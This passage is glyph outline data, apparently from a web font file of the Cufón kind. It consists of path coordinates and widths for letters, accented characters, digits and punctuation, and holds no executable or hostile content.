56r0,111","w":254},{"d":"169,-199r-9,5r-56,-45r-56,45r-9,-5v17,-23,29,-51,50,-70v53,-11,52,37,80,70xm211,-17r0,13v-26,13,-81,14,-87,-16v-21,34,-110,37,-110,-18v0,-59,72,-53,110,-73v-1,-26,2,-56,-26,-54v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26v6,-31,43,-40,79,-41v47,0,81,10,81,58v0,40,-24,112,29,104xm75,-48v0,32,37,32,48,12r1,-59v-25,8,-49,15,-49,47","w":214},{"d":"114,-290v-26,-9,-21,-41,8,-38v24,2,29,19,44,32r29,28r-6,7v-28,-13,-52,-21,-75,-29xm148,-256v82,0,135,48,135,130v0,83,-51,133,-137,133v-80,0,-134,-48,-134,-129v0,-82,52,-134,136,-134xm148,-10v55,0,64,-56,64,-115v0,-56,-10,-114,-64,-114v-51,0,-66,53,-65,115v1,58,10,114,65,114","w":295},{"d":"56,-35v-3,19,16,19,36,21r0,14r-102,0r0,-14v24,-1,37,-12,45,-31r86,-208r36,0r87,216v7,13,18,23,39,23r0,14r-136,0r0,-14v10,-1,45,-2,33,-18r-21,-51r-86,0v-7,14,-15,33,-17,48xm152,-101r-36,-90r-36,90r72,0","w":272},{"d":"59,-64v17,0,35,17,35,35v0,18,-17,34,-35,34v-18,0,-35,-17,-35,-34v0,-17,17,-35,35,-35","w":118},{"d":"25,-159v10,-78,113,-122,189,-81v6,-6,13,-11,27,-9r1,91r-15,0v-10,-59,-71,-110,-116,-61v-11,12,-15,33,-18,60r61,0r-8,20r-54,0v0,9,-2,19,0,27r44,0r-8,21r-34,0v6,43,22,73,67,73v39,0,59,-25,77,-54r15,9v-20,40,-50,69,-108,70v-65,1,-111,-42,-121,-98r-24,0r8,-21r14,0v0,-9,-2,-18,0,-27r-22,0r8,-20r17,0","w":257},{"d":"221,-123r-188,0r0,-29r188,0r0,29xm221,-50r-188,0r0,-29r188,0r0,29"},{"d":"94,-148v19,-29,89,-48,91,6v1,17,-13,33,-30,33v-24,0,-35,-18,-28,-41v-14,0,-26,10,-33,19r0,97v-1,18,18,20,34,21r0,13r-118,0r0,-13v16,0,27,-4,27,-19r0,-102v-1,-17,-13,-23,-29,-25r0,-13v28,0,62,-7,86,-2r0,26","w":187},{"d":"49,-269v59,7,8,83,5,124r-12,0v-4,-28,-23,-73,-23,-96v0,-16,13,-30,30,-28","w":96},{"d":"120,50v0,-11,-12,-10,-24,-11r0,-34v-52,-6,-84,-36,-84,-93v0,-56,41,-90,102,-91v37,0,70,13,70,45v0,18,-9,28,-30,28v-33,0,-35,-30,-25,-53v-36,-22,-53,29,-53,69v0,36,19,70,50,70v28,0,40,-14,52,-33r13,9v-15,27,-38,49,-80,49r0,12v42,-7,60,41,24,55v-16,6,-34,6,-59,6r0,-14v18,-1,44,5,44,-14","w":191},{"d":"211,-17r0,13v-26,13,-81,14,-87,-16v-21,34,-110,37,-110,-18v0,-59,72,-53,110,-73v-1,-26,2,-56,-26,-54v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26v6,-31,43,-40,79,-41v47,0,81,10,81,58v0,40,-24,112,29,104xm75,-48v0,32,37,32,48,12r1,-59v-25,8,-49,15,-49,47xm67,-234v-20,-11,-18,-40,7,-38v31,1,30,20,47,41r23,31r-7,6v-30,-20,-45,-26,-70,-40","w":214},{"d":"206,-229v-4,-6,-14,-6,-26,-7r0,-13r109,0r0,13v-64,5,-86,54,-122,85r88,109v12,14,25,27,50,28r0,14r-99,0v-30,-47,-55,-75,-86,-115r-9,0r0,78v-1,19,17,21,33,23r0,14r-132,0r0,-14v17,-1,37,-2,37,-21r0,-177v1,-19,-21,-21,-37,-24r0,-13r137,0r0,13v-17,2,-38,2,-38,23r0,84r7,0v28,-28,74,-61,88,-100","w":294},{"d":"127,-202v15,0,28,14,28,29v0,16,-13,30,-28,30v-15,0,-29,-14,-29,-30v0,-16,14,-29,29,-29xm224,-87r-195,0r0,-28r195,0r0,28xm127,-59v15,0,28,14,28,30v0,15,-14,29,-28,29v-15,0,-29,-13,-29,-29v0,-16,14,-30,29,-30"},{"d":"126,-195v66,0,108,35,108,101v0,64,-41,100,-108,100v-67,0,-108,-36,-108,-100v0,-64,41,-101,108,-101xm126,-9v38,-4,42,-42,42,-85v0,-41,-3,-85,-42,-85v-39,0,-42,44,-42,85v0,42,5,81,42,85","w":252},{"d":"220,-73v0,84,-119,96,-179,61v-7,6,-11,15,-27,12r-3,-90r15,0v17,36,36,75,87,79v40,3,66,-42,38,-66v-40,-35,-133,-27,-133,-104v0,-76,106,-90,161,-58v6,-6,12,-12,26,-10r1,85r-15,0v-14,-34,-28,-72,-73,-75v-34,-3,-59,40,-33,62v41,35,135,26,135,104","w":233},{"d":"87,-154v46,-54,133,-12,133,68v0,67,-75,114,-134,79r0,49v-1,20,21,21,38,23r0,13r-127,0r0,-13v16,0,31,-3,31,-21r0,-272v-1,-18,-14,-26,-32,-27r0,-13v29,0,64,-7,90,-2xm118,-11v51,0,58,-140,-2,-141v-15,-1,-23,7,-30,14v4,49,-17,127,32,127","w":232},{"d":"175,-303v19,2,22,-12,28,-25r13,4v-9,24,-22,51,-53,53v-29,1,-41,-16,-65,-20v-15,1,-18,12,-26,26r-13,-5v9,-22,22,-50,52,-52v29,-2,41,17,64,19xm56,-35v-3,19,16,19,36,21r0,14r-102,0r0,-14v24,-1,37,-12,45,-31r86,-208r36,0r87,216v7,13,18,23,39,23r0,14r-136,0r0,-14v10,-1,45,-2,33,-18r-21,-51r-86,0v-7,14,-15,33,-17,48xm152,-101r-36,-90r-36,90r72,0","w":272},{"d":"199,-25r-10,8v-27,-22,-61,-38,-83,-65v-11,-36,18,-46,41,-63r42,-30r10,8r-55,72xm121,-25r-9,8v-27,-22,-61,-38,-83,-65v-11,-36,18,-46,41,-63r42,-30r9,8r-54,72","w":219},{"d":"121,-76r-106,0r0,-39r106,0r0,39","w":136},{"d":"93,-290v-26,-9,-20,-40,9,-38v24,2,29,18,43,32r29,28r-6,7v-28,-13,-52,-21,-75,-29xm56,-35v-3,19,16,19,36,21r0,14r-102,0r0,-14v24,-1,37,-12,45,-31r86,-208r36,0r87,216v7,13,18,23,39,23r0,14r-136,0r0,-14v10,-1,45,-2,33,-18r-21,-51r-86,0v-7,14,-15,33,-17,48xm152,-101r-36,-90r-36,90r72,0","w":272},{"d":"230,-266r-6,5r-61,-36r-61,36r-5,-5v17,-20,31,-43,51,-60v28,-9,42,10,53,25v6,9,7,9,29,35xm236,-91v-2,-61,17,-146,-45,-145r0,-13r108,0r0,13v-63,-2,-43,91,-43,152v0,56,-44,91,-101,91v-67,0,-111,-29,-111,-91r0,-128v0,-18,-18,-22,-34,-24r0,-13r131,0r0,13v-18,1,-35,4,-35,22v0,82,-26,200,64,197v42,-2,68,-28,66,-74","w":300},{"d":"206,-266r-6,5r-62,-36r-60,36r-6,-5v25,-21,32,-70,81,-60v26,24,21,24,53,60xm56,-35v-3,19,16,19,36,21r0,14r-102,0r0,-14v24,-1,37,-12,45,-31r86,-208r36,0r87,216v7,13,18,23,39,23r0,14r-136,0r0,-14v10,-1,45,-2,33,-18r-21,-51r-86,0v-7,14,-15,33,-17,48xm152,-101r-36,-90r-36,90r72,0","w":272},{"d":"116,-255v17,0,34,14,34,32v0,17,-17,33,-34,33v-17,0,-34,-16,-34,-33v0,-18,17,-32,34,-32xm155,-72v18,-1,29,13,29,29v-1,31,-42,48,-79,48v-75,0,-113,-82,-63,-129v15,-15,38,-23,66,-26r1,-24r16,0r0,68v-31,4,-55,19,-55,54v0,33,34,55,61,36v-9,-21,-10,-61,24,-56","w":197},{"d":"206,-39v-2,18,14,22,31,22r0,13v-29,0,-63,7,-89,3v-1,-5,1,-13,-1,-17v-10,11,-32,25,-53,24v-49,0,-80,-44,-82,-95v-2,-66,76,-113,136,-79r0,-58v-1,-22,-19,-28,-40,-29r0,-13r95,-4r3,3r0,230xm117,-20v15,0,24,-6,31,-15v-5,-48,18,-127,-32,-127v-51,0,-60,140,1,142","w":238},{"d":"184,-303v20,2,24,-11,29,-25r13,4v-9,24,-22,52,-53,53v-29,1,-42,-16,-66,-20v-15,2,-17,12,-25,26r-13,-5v9,-22,21,-50,52,-52v28,-1,40,17,63,19xm148,-256v82,0,135,48,135,130v0,83,-51,133,-137,133v-80,0,-134,-48,-134,-129v0,-82,52,-134,136,-134xm148,-10v55,0,64,-56,64,-115v0,-56,-10,-114,-64,-114v-51,0,-66,53,-65,115v1,58,10,114,65,114","w":295},{"d":"91,-290v-26,-9,-20,-40,9,-38v24,2,29,19,44,32r28,28r-6,7v-28,-13,-52,-21,-75,-29xm49,-212v2,-20,-22,-20,-37,-24r0,-13r221,0r0,63r-13,0v-11,-38,-49,-56,-109,-48r0,97v42,4,68,-9,71,-43r14,0r0,104r-14,0v-3,-35,-26,-52,-71,-45v4,46,-19,116,41,105v56,9,72,-31,86,-62r13,0r-5,78r-234,0r0,-14v18,-1,38,-4,37,-22r0,-176","w":259},{"d":"11,-14v17,-1,38,0,38,-21r0,-177v2,-20,-23,-20,-38,-24r0,-13r138,0r0,13v-17,2,-38,3,-38,23r0,176v-1,19,21,21,38,23r0,14r-138,0r0,-14xm124,-329v15,0,28,15,28,30v0,14,-13,29,-28,29v-16,0,-29,-14,-29,-29v0,-15,14,-30,29,-30xm36,-329v15,0,29,15,29,30v0,15,-13,29,-29,29v-15,0,-28,-15,-28,-29v1,-15,12,-30,28,-30","w":160},{"d":"76,-315v27,-37,79,8,34,25r-75,29r-6,-7xm11,-14v17,-1,38,0,38,-21r0,-177v2,-20,-23,-20,-38,-24r0,-13r138,0r0,13v-17,2,-38,3,-38,23r0,176v-1,19,21,21,38,23r0,14r-138,0r0,-14","w":160},{"d":"236,-91v-2,-61,17,-146,-45,-145r0,-13r108,0r0,13v-63,-2,-43,91,-43,152v0,56,-44,91,-101,91v-67,0,-111,-29,-111,-91r0,-128v0,-18,-18,-22,-34,-24r0,-13r131,0r0,13v-18,1,-35,4,-35,22v0,82,-26,200,64,197v42,-2,68,-28,66,-74","w":300},{"d":"146,-315v12,-24,68,-11,48,16v-22,18,-58,23,-89,38r-6,-7xm56,-35v-3,19,16,19,36,21r0,14r-102,0r0,-14v24,-1,37,-12,45,-31r86,-208r36,0r87,216v7,13,18,23,39,23r0,14r-136,0r0,-14v10,-1,45,-2,33,-18r-21,-51r-86,0v-7,14,-15,33,-17,48xm152,-101r-36,-90r-36,90r72,0","w":272},{"d":"155,-239v34,27,61,66,61,128v0,71,-36,116,-103,117v-57,1,-101,-37,-101,-94v0,-74,89,-118,142,-71v-4,-24,-12,-47,-25,-63r-37,23r-10,-14r36,-23r-30,-23r8,-13v16,6,28,12,44,22r34,-22r11,14xm115,-9v34,-4,38,-42,38,-79v0,-36,-4,-74,-38,-74v-34,0,-38,37,-38,73v0,40,3,76,38,80","w":229},{"d":"121,-76r-106,0r0,-39r106,0r0,39","w":136},{"d":"265,-138v9,-17,-12,-22,-24,-24r0,-12r72,0r0,12v-31,5,-33,45,-46,70v-9,17,-25,64,-34,94r-34,0r-44,-120r-42,120r-34,0r-55,-145v-3,-11,-15,-16,-26,-19r0,-12r107,0r0,12v-8,1,-30,4,-20,17r32,86r39,-115r35,0r45,119","w":310},{"d":"254,-282r-255,0r0,-21r255,0r0,21"},{"d":"95,-34v-1,16,13,19,26,21r0,13r-111,0r0,-13v15,0,27,-3,27,-19r0,-102v-1,-17,-14,-23,-31,-25r0,-13v29,0,64,-7,89,-2r0,140xm98,-267v15,-1,28,14,28,30v0,15,-13,29,-28,29v-15,0,-28,-15,-28,-29v0,-15,13,-30,28,-30xm18,-267v15,0,28,15,28,30v0,14,-13,29,-28,29v-15,0,-29,-14,-28,-29v1,-15,12,-31,28,-30","w":127},{"d":"114,-195v111,0,129,151,58,210v-30,25,-68,44,-118,51r-4,-17v58,-9,91,-41,99,-100v-45,45,-134,17,-134,-58v0,-52,46,-86,99,-86xm116,-52v23,0,35,-11,35,-40v0,-42,-6,-82,-36,-87v-47,3,-49,127,1,127","w":233},{"d":"54,-60v46,0,52,64,23,95v-13,14,-26,25,-43,33r-8,-12v21,-12,42,-25,44,-56v-52,12,-61,-60,-16,-60","w":118},{"d":"22,-138v9,-47,107,-53,140,-24v50,-35,150,-15,135,69r-115,0v0,44,14,73,56,73v25,0,40,-16,51,-32r13,10v-22,55,-133,64,-166,14v-19,38,-121,52,-122,-10v-1,-59,71,-54,110,-71v-1,-27,3,-58,-26,-56v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26xm236,-109v-1,-25,0,-56,-25,-56v-24,0,-29,26,-29,57xm75,-49v0,34,39,32,49,13r0,-58v-23,8,-49,12,-49,45","w":308},{"d":"214,-266r-5,5r-62,-36r-61,36r-5,-5v25,-21,32,-70,81,-60v27,24,21,24,52,60xm148,-256v82,0,135,48,135,130v0,83,-51,133,-137,133v-80,0,-134,-48,-134,-129v0,-82,52,-134,136,-134xm148,-10v55,0,64,-56,64,-115v0,-56,-10,-114,-64,-114v-51,0,-66,53,-65,115v1,58,10,114,65,114","w":295},{"d":"92,-234v-48,-7,-65,25,-76,56r-14,0r0,-71r242,0r0,71r-14,0v-12,-29,-26,-65,-76,-56r0,196v-1,20,21,22,39,24r0,14r-139,0r0,-14v16,-1,38,-1,38,-22r0,-198","w":246},{"d":"223,-9r-30,0r0,-83r-164,0r0,-29r194,0r0,112"},{"d":"214,-34r-20,20r-68,-67r-67,67r-20,-20r68,-67r-68,-67r20,-21r67,68r68,-68r20,21r-68,67"},{"d":"114,-160v-2,35,24,38,54,41r0,26v-30,3,-58,7,-54,42v6,57,-2,107,-59,107v-13,1,-28,3,-43,3r0,-16v42,3,45,-28,45,-73v0,-45,27,-61,64,-69r0,-13v-49,-6,-70,-40,-64,-103v3,-31,-18,-38,-45,-40r0,-15v58,-1,106,8,104,67","w":180},{"d":"53,-290v-26,-9,-21,-41,8,-38v24,2,29,19,44,32r29,28r-6,7v-28,-13,-52,-21,-75,-29xm11,-14v17,-1,38,0,38,-21r0,-177v2,-20,-23,-20,-38,-24r0,-13r138,0r0,13v-17,2,-38,3,-38,23r0,176v-1,19,21,21,38,23r0,14r-138,0r0,-14","w":160},{"d":"161,-140v36,13,62,31,64,70v4,96,-207,106,-207,10v0,-37,26,-52,61,-60v-28,-13,-50,-34,-51,-68v-1,-86,187,-94,187,-7v0,33,-24,46,-54,55xm149,-146v13,-30,16,-95,-27,-95v-36,0,-47,54,-18,71v12,7,32,18,45,24xm123,-9v44,0,57,-58,23,-78v-15,-9,-38,-18,-54,-27v-24,30,-20,105,31,105","w":243},{"d":"84,-137v45,-49,134,-19,134,56v0,51,-46,87,-99,87v-112,0,-128,-151,-57,-211v31,-26,67,-45,117,-51r5,17v-62,6,-90,45,-100,102xm119,-9v46,-3,49,-128,-1,-128v-24,0,-36,11,-36,41v0,43,7,82,37,87","w":233},{"d":"159,-138v10,-17,-10,-21,-23,-24r0,-12r73,0r0,12v-39,9,-41,59,-59,89v-33,54,-39,138,-109,151v-38,7,-53,-58,-10,-57v19,0,28,13,38,25v8,-8,23,-27,27,-41r-74,-148v-5,-11,-14,-17,-27,-19r0,-12r108,0r0,12v-9,1,-27,3,-20,17r43,86xm155,-267v15,0,28,15,28,30v0,14,-13,29,-28,29v-16,0,-29,-14,-29,-29v0,-15,14,-30,29,-30xm67,-267v15,0,29,15,29,30v0,15,-13,29,-29,29v-15,0,-28,-15,-28,-29v1,-15,12,-30,28,-30","w":202},{"d":"134,-20v24,0,41,-17,52,-32r13,10v-17,27,-44,48,-86,48v-63,0,-101,-33,-101,-94v0,-56,37,-91,97,-91v57,0,88,27,85,86r-118,0v0,45,14,74,58,73xm132,-109v-1,-26,-1,-56,-26,-56v-25,0,-30,25,-30,57","w":205},{"d":"49,-83v52,-32,152,-17,152,60v0,55,-50,89,-107,88v-39,1,-84,-19,-84,-52v0,-16,12,-30,29,-30v35,0,37,39,24,63v47,12,70,-24,73,-69v3,-56,-72,-74,-95,-32r-14,-5r17,-129r148,0r0,48r-135,0","w":215},{"d":"159,-138v10,-17,-10,-21,-23,-24r0,-12r73,0r0,12v-39,9,-41,59,-59,89v-33,54,-39,138,-109,151v-38,7,-53,-58,-10,-57v19,0,28,13,38,25v8,-8,23,-27,27,-41r-74,-148v-5,-11,-14,-17,-27,-19r0,-12r108,0r0,12v-9,1,-27,3,-20,17r43,86xm109,-254v8,-26,67,-23,50,10v-19,19,-56,34,-81,50r-8,-6","w":202},{"d":"182,-14v17,0,36,-3,36,-21r0,-86r-107,0r0,84v-1,19,19,21,36,23r0,14r-135,0r0,-14v17,0,37,-2,37,-21r0,-177v0,-18,-21,-22,-37,-24r0,-13r135,0r0,13v-16,2,-36,3,-36,23r0,74r107,0r0,-73v0,-18,-21,-20,-36,-24r0,-13r135,0r0,13v-16,3,-37,3,-37,23r0,176v-1,20,19,22,37,23r0,14r-135,0r0,-14","w":328},{"d":"159,-90v39,44,-7,96,-67,96v-21,0,-47,-7,-59,-16r-5,12r-14,0r-2,-65r13,0v10,26,29,50,64,54v32,3,43,-34,19,-45v-37,-17,-90,-17,-91,-70v-2,-55,82,-66,127,-45v1,-8,6,-12,17,-10r3,60r-12,0v-6,-21,-28,-45,-54,-45v-28,0,-39,30,-17,41v20,10,65,18,78,33","w":184},{"d":"216,-89r-175,88r0,-33r138,-67r-138,-67r0,-33r175,88r0,24"},{"d":"12,-122v-6,-110,113,-161,208,-118v6,-6,12,-11,26,-9r2,91r-16,0v-16,-45,-30,-81,-79,-81v-52,0,-71,52,-70,111v0,62,17,115,69,117v18,0,37,-7,46,-15r0,-51v2,-21,-21,-21,-38,-24r0,-14r130,0r0,14v-42,-5,-32,41,-31,79v-22,14,-80,30,-116,29v-81,-2,-128,-48,-131,-129","w":290},{"d":"128,54r-116,0r0,-17r61,0r0,-287r-61,0r0,-17r116,0r0,321","w":160},{"d":"133,-269v59,6,9,84,6,124r-12,0v-4,-28,-23,-73,-23,-96v0,-15,13,-30,29,-28xm50,-269v59,6,9,84,6,124r-12,0v-4,-28,-23,-73,-23,-96v0,-15,13,-30,29,-28","w":183},{"d":"226,-131r-46,0r-14,45r49,0r0,28r-57,0r-18,58r-26,0r17,-58r-40,0r-18,58r-26,0r18,-58r-38,0r0,-28r46,0r14,-45r-49,0r0,-29r58,0r18,-60r26,0r-18,60r40,0r19,-60r26,0r-19,60r38,0r0,29xm154,-132r-41,0r-14,46r41,0"},{"d":"134,-267v15,0,28,15,28,30v0,14,-13,29,-28,29v-16,0,-29,-14,-29,-29v0,-15,14,-30,29,-30xm46,-267v15,0,29,15,29,30v0,15,-13,29,-29,29v-15,0,-28,-15,-28,-29v1,-15,12,-30,28,-30","w":180},{"d":"235,-81v-5,-63,20,-155,-43,-155r0,-13r107,0r0,13v-33,0,-43,19,-43,59r0,178r-31,0r-156,-192v7,68,-25,176,44,177r0,14r-107,0r0,-14v35,-1,46,-17,43,-58v-5,-64,22,-160,-44,-163r0,-14r94,0","w":302},{"d":"211,-17r0,13v-26,13,-81,14,-87,-16v-21,34,-110,37,-110,-18v0,-59,72,-53,110,-73v-1,-26,2,-56,-26,-54v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26v6,-31,43,-40,79,-41v47,0,81,10,81,58v0,40,-24,112,29,104xm75,-48v0,32,37,32,48,12r1,-59v-25,8,-49,15,-49,47xm102,-254v8,-26,67,-23,50,10v-19,19,-56,34,-81,50r-8,-6","w":214},{"d":"206,41v-2,19,16,22,32,24r0,13r-123,0r0,-13v16,0,35,-2,33,-21v-2,-19,4,-46,-2,-61v-47,50,-134,6,-134,-72v0,-80,101,-112,164,-73v11,-7,17,-28,32,-20xm117,-21v16,0,23,-7,31,-14v-5,-49,18,-129,-33,-129v-51,0,-59,143,2,143","w":233},{"d":"248,-190v0,40,-25,57,-61,67r76,94v10,12,18,13,35,15r0,14r-95,0v-17,-25,-30,-45,-41,-60v-11,-15,-25,-32,-41,-52r-10,0r0,75v-2,19,19,20,34,23r0,14r-133,0r0,-14v18,0,38,-4,37,-22r0,-176v2,-20,-23,-20,-37,-24r0,-13v90,7,236,-29,236,59xm111,-129v44,2,69,-13,68,-56v0,-39,-26,-51,-68,-48r0,104","w":287},{"d":"144,-249v83,2,144,40,144,126v0,85,-64,123,-150,123r-126,0r0,-14v18,0,38,-2,37,-21r0,-177v0,-18,-21,-22,-37,-24r0,-13r132,0xm144,-16v59,0,73,-47,73,-107v-1,-71,-27,-118,-106,-110r0,190v1,19,12,27,33,27","w":300},{"d":"158,-268r-122,343r-31,0r121,-343r32,0","w":169},{"d":"196,-242v78,0,122,43,126,116v3,55,-37,107,-88,106v-24,0,-41,-9,-48,-24v-20,36,-93,27,-88,-27v5,-54,37,-100,90,-100v16,0,24,6,28,18r6,-16r45,0v-12,40,-30,74,-39,117v0,9,3,16,13,16v42,0,63,-45,61,-92v-2,-63,-42,-96,-107,-96v-81,0,-133,54,-133,138v0,80,42,126,120,126v42,0,71,-12,95,-30r7,11v-26,20,-58,37,-103,36v-89,-3,-153,-49,-153,-141v0,-97,68,-158,168,-158xm145,-66v-3,30,30,31,37,10r27,-78v0,-12,-7,-22,-19,-22v-33,8,-41,51,-45,90","w":348},{"d":"203,-65v25,29,40,48,86,51r0,14r-103,0r-22,-26v-37,47,-153,43,-152,-32v1,-45,31,-61,63,-77v-17,-22,-26,-33,-28,-63v-5,-67,133,-82,133,-11v0,33,-18,47,-44,62r57,70v10,-17,22,-32,22,-53v0,-12,-17,-11,-30,-15r0,-13r99,0r0,13v-55,0,-53,53,-81,80xm127,-158v28,-12,40,-78,-1,-81v-44,6,-19,61,1,81xm83,-124v-37,36,-8,119,54,96v5,-2,11,-4,17,-9","w":287},{"d":"142,-16v67,6,70,-31,90,-68r14,0r-9,84r-234,0r0,-11r161,-222r-54,0v-55,-2,-56,23,-80,60r-14,0r8,-76r217,0r0,10r-161,223r62,0","w":248},{"d":"47,-81v34,0,34,38,22,59v8,3,26,11,39,10r0,-79v-45,-2,-83,-21,-83,-66v0,-46,36,-69,83,-73r0,-38r18,0r0,38v39,1,78,16,80,49v0,16,-11,29,-27,29v-33,0,-32,-37,-21,-57v-7,-4,-21,-6,-32,-6r0,72v48,5,86,22,86,71v1,46,-42,72,-86,75r0,50r-18,0r0,-50v-41,1,-87,-22,-89,-55v0,-16,10,-29,28,-29xm67,-180v-1,26,18,33,41,36r0,-71v-22,2,-41,13,-41,35xm126,-12v28,-3,45,-15,45,-40v0,-25,-20,-34,-45,-37r0,77","w":230},{"d":"148,-256v82,0,135,48,135,130v0,83,-51,133,-137,133v-80,0,-134,-48,-134,-129v0,-82,52,-134,136,-134xm148,-10v55,0,64,-56,64,-115v0,-56,-10,-114,-64,-114v-51,0,-66,53,-65,115v1,58,10,114,65,114","w":295},{"d":"159,-138v10,-17,-10,-21,-23,-24r0,-12r73,0r0,12v-39,9,-41,59,-59,89v-33,54,-39,138,-109,151v-38,7,-53,-58,-10,-57v19,0,28,13,38,25v8,-8,23,-27,27,-41r-74,-148v-5,-11,-14,-17,-27,-19r0,-12r108,0r0,12v-9,1,-27,3,-20,17r43,86","w":202},{"d":"111,-49v-8,47,61,36,90,24v12,-11,26,-39,33,-55r13,0r-5,80r-230,0r0,-14v18,-1,37,-2,37,-22r0,-176v1,-19,-21,-21,-37,-24r0,-13r137,0r0,13v-17,2,-38,2,-38,23r0,164","w":246},{"d":"39,-134v0,-17,-16,-24,-34,-25r0,-13v30,0,66,-7,92,-2r0,153v-2,59,-35,93,-95,99v-45,4,-62,-57,-16,-57v26,0,27,20,39,41v27,-31,14,-134,14,-196xm63,-272v18,0,35,14,35,32v0,18,-17,32,-35,32v-18,0,-35,-14,-35,-32v0,-18,17,-32,35,-32","w":124},{"d":"49,-212v2,-20,-22,-20,-37,-24r0,-13r221,0r0,63r-13,0v-11,-38,-49,-56,-109,-48r0,97v42,4,68,-9,71,-43r14,0r0,104r-14,0v-3,-35,-26,-52,-71,-45v4,46,-19,116,41,105v56,9,72,-31,86,-62r13,0r-5,78r-234,0r0,-14v18,-1,38,-4,37,-22r0,-176","w":259},{"d":"92,-154v46,-54,142,-11,132,68v5,67,-74,114,-133,79r0,49v-2,21,21,21,38,23r0,13r-127,0r0,-13v16,0,31,-3,31,-21r0,-179v-1,-17,-14,-23,-31,-24r0,-13v29,0,64,-7,89,-2v1,6,-1,15,1,20xm123,-11v51,0,56,-140,-2,-141v-15,-1,-24,6,-30,14v4,49,-17,127,32,127","w":236},{"d":"114,-179v63,0,102,30,102,91v0,62,-40,94,-103,94v-60,0,-101,-33,-101,-93v0,-60,40,-91,102,-92xm115,-9v35,0,37,-41,37,-79v0,-34,-1,-78,-37,-77v-35,1,-38,38,-38,76v0,41,1,80,38,80xm112,-254v8,-26,67,-23,50,10v-19,19,-56,34,-81,50r-8,-6","w":228},{"d":"92,-255v77,0,115,84,62,130v-16,15,-37,23,-64,25r-1,24r-16,0r0,-68v58,7,76,-93,17,-97v-10,0,-17,3,-24,7v10,22,12,56,-23,56v-18,0,-29,-13,-29,-29v1,-30,42,-48,78,-48xm82,-60v18,0,33,16,33,33v0,18,-16,32,-33,32v-17,1,-34,-14,-34,-32v0,-17,16,-33,34,-33","w":197},{"d":"141,-239v19,2,22,-12,28,-25r14,4v-9,24,-23,51,-54,53v-29,1,-41,-16,-65,-20v-15,2,-18,13,-26,26r-13,-5v10,-22,23,-50,52,-52v29,-2,41,17,64,19xm211,-17r0,13v-26,13,-81,14,-87,-16v-21,34,-110,37,-110,-18v0,-59,72,-53,110,-73v-1,-26,2,-56,-26,-54v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26v6,-31,43,-40,79,-41v47,0,81,10,81,58v0,40,-24,112,29,104xm75,-48v0,32,37,32,48,12r1,-59v-25,8,-49,15,-49,47","w":214},{"d":"80,-106v0,77,16,134,69,148r0,16v-147,-4,-172,-261,-47,-313v15,-7,31,-12,47,-14r0,16v-54,13,-69,71,-69,147","w":160},{"d":"66,-175v18,0,35,17,35,35v0,18,-17,34,-35,34v-18,0,-35,-17,-35,-34v0,-17,17,-35,35,-35xm62,-60v45,0,50,64,22,95v-13,14,-26,25,-43,33r-8,-12v21,-12,42,-25,44,-56v-52,12,-61,-60,-15,-60","w":132},{"d":"184,-328v15,0,28,14,28,29v0,16,-13,30,-28,30v-15,0,-28,-14,-28,-30v0,-15,14,-29,28,-29xm90,-328v15,0,28,14,28,29v0,16,-13,30,-28,30v-15,0,-29,-15,-28,-30v0,-15,12,-29,28,-29xm49,-212v2,-20,-22,-20,-37,-24r0,-13r221,0r0,63r-13,0v-11,-38,-49,-56,-109,-48r0,97v42,4,68,-9,71,-43r14,0r0,104r-14,0v-3,-35,-26,-52,-71,-45v4,46,-19,116,41,105v56,9,72,-31,86,-62r13,0r-5,78r-234,0r0,-14v18,-1,38,-4,37,-22r0,-176","w":259},{"d":"212,-224v-3,-10,-11,-10,-28,-12r0,-13r97,0r0,13v-42,4,-58,37,-80,62r-29,33r78,111v12,10,22,15,42,16r0,14r-152,0r0,-14v57,4,23,-33,9,-55r-21,-32v-32,39,-44,48,-57,75v1,11,15,10,27,12r0,14r-96,0r0,-14v46,-3,60,-39,83,-65r32,-37r-73,-103v-12,-11,-22,-16,-42,-17r0,-13r153,0r0,13v-48,-4,-30,24,-14,49r20,31v29,-36,40,-42,51,-68","w":291},{"d":"114,-179v63,0,102,30,102,91v0,62,-40,94,-103,94v-60,0,-101,-33,-101,-93v0,-60,40,-91,102,-92xm115,-9v35,0,37,-41,37,-79v0,-34,-1,-78,-37,-77v-35,1,-38,38,-38,76v0,41,1,80,38,80","w":228},{"d":"222,-2r-38,0r0,67r-59,0r0,-67r-116,0r0,-32r126,-160r49,0r0,155r38,0r0,37xm125,-39r0,-113r-89,113r89,0","w":233},{"d":"147,-266r-6,5r-61,-36r-61,36r-6,-5v18,-20,32,-43,52,-60v28,-9,42,10,53,25v6,9,7,9,29,35xm11,-14v17,-1,38,0,38,-21r0,-177v2,-20,-23,-20,-38,-24r0,-13r138,0r0,13v-17,2,-38,3,-38,23r0,176v-1,19,21,21,38,23r0,14r-138,0r0,-14","w":160},{"d":"165,75r-32,0r-121,-343r32,0","w":169},{"d":"207,-328v15,0,28,14,28,29v0,16,-13,30,-28,30v-15,0,-28,-14,-28,-30v0,-15,14,-29,28,-29xm113,-328v35,0,36,59,0,59v-15,1,-29,-15,-28,-30v0,-15,12,-29,28,-29xm236,-91v-2,-61,17,-146,-45,-145r0,-13r108,0r0,13v-63,-2,-43,91,-43,152v0,56,-44,91,-101,91v-67,0,-111,-29,-111,-91r0,-128v0,-18,-18,-22,-34,-24r0,-13r131,0r0,13v-18,1,-35,4,-35,22v0,82,-26,200,64,197v42,-2,68,-28,66,-74","w":300},{"d":"135,-315v12,-25,71,-7,47,16v-20,20,-57,23,-88,38r-6,-7xm49,-212v2,-20,-22,-20,-37,-24r0,-13r221,0r0,63r-13,0v-11,-38,-49,-56,-109,-48r0,97v42,4,68,-9,71,-43r14,0r0,104r-14,0v-3,-35,-26,-52,-71,-45v4,46,-19,116,41,105v56,9,72,-31,86,-62r13,0r-5,78r-234,0r0,-14v18,-1,38,-4,37,-22r0,-176","w":259},{"d":"85,75r-30,0r0,-343r30,0r0,343","w":139},{"d":"75,-257v35,0,61,26,61,59v0,33,-27,58,-61,58v-34,0,-60,-26,-60,-58v0,-34,26,-59,60,-59xm76,-156v19,-1,28,-19,28,-41v0,-25,-8,-43,-29,-44v-20,0,-28,21,-28,42v0,23,8,44,29,43","w":151},{"d":"136,-127v8,-7,33,-37,0,-35r0,-12r70,